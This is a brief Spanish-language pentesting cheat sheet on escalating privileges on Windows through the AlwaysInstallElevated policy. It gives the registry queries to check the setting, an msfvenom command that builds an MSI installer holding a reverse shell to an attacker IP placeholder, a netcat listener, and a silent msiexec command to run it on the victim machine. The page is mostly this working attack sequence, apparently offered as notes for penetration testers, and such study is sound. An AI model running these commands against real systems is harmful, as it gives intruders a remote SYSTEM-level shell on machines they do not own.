Always install elevated
Revisar si el valor de ambos AlwaysInstallElevated
es 1
.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Generación de instalador "MSI" (Microsoft Installer) con reverse shell.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP-address> LPORT=<listen-port> -f msi -o reverse-shell.msi
Dejer netcat en modo escucha para recibir la reverse shell.
nc -lvnp <listen-port>
Copiar a la máquina victima el instalador generado reverse-shell.msi
y ejecutarlo de la siguiente forma:
msiexec /quiet /qn /i reverse-shell.msi
Última actualización
¿Te fue útil?